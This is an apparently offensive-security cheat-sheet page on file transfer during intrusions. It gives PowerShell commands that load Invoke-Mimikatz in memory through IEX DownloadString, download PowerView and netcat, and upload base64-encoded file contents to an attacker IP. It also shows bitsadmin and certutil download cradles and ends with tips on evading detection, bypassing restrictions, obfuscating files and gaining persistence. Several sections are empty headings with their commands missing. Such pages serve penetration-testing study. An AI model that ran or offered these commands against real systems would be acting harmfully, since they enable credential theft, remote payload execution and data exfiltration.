search
LinkedInGithub
githubEdit

File Transfer

hashtag
PowerShell Commands

  1. Download a File

    Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

  2. Execute File in Memory

    IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

  3. Upload a File

    Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

  4. Download with Custom User-Agent

    Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

  5. Base64 Encoded Upload

    $bytes = [System.IO.File]::ReadAllBytes("C:\Temp\file.txt")
$b64 = [System.Convert]::ToBase64String($bytes)
Invoke-WebRequest -Uri http://10.10.10.32/upload -Method POST -Body $b64

hashtag
Windows Native Tools

  1. Bitsadmin (Deprecated but Still Useful)

    bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

  2. Certutil (Native to Windows for Certificate Management)

    certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

hashtag
Linux-Based Tools

  1. Wget

  2. cURL

  3. Python HTTP File Download

hashtag
Other Methods

  1. PHP File Download

  1. SCP (Secure Copy Protocol) - Upload

  2. SCP - Download

  3. Netcat (Linux/Windows) Send File:

Receive File:

  1. FTP Upload/Download (Interactive)

  1. TFTP (Trivial File Transfer Protocol) Download:

Upload:

  1. SMB (Using SMBClient)

hashtag
Extra Tips

  • Bypass Restrictions: Consider using alternative ports, URL encoding, or modifying headers to bypass security restrictions.

  • Evasion Techniques: Use legitimate-looking User-Agents, filenames, or paths to evade detection.

  • Persistence: Combine these methods with scheduled tasks or registry modifications for persistence.

  • File Obfuscation: Encode files in Base64 to evade basic detection.

  • Alternate Data Streams (Windows):

  • Compression & Encryption: Compress files using zip or 7z with a password.

PreviousSession Security GuideNextFile Upload Attacks

Last updated